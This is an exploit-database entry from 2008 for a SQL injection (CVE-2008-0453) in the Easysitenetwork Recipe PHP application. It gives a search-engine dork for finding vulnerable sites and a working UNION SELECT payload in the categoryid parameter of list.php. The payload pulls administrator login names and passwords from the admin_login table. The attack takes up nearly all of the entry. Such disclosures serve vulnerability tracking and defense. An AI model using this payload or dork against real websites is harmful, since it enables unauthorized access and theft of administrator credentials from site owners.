Easysitenetwork Recipe - 'categoryId' SQL Injection
Author: S@BUN
type: webapps
platform: php
port:
date_added: 2008-01-21
date_updated: 2016-10-27
verified: 1
codes: OSVDB-40927;CVE-2008-0453
tags:
aliases:
screenshot_url:
application_url:
#########################################################################
#
# Recipes hacking(list.php?pagenum)SQL Injection
#
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
#
# DORKS 2 : allinurl: " list.php?pagenum"
#
#########################################################################
# EXPLOIT
#
# list.php?pagenum=0&categoryid=1+union+select+111,222,concat_ws(char(58),login,password),444+from+admin_login/*
#
#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################
# milw0rm.com [2008-01-22]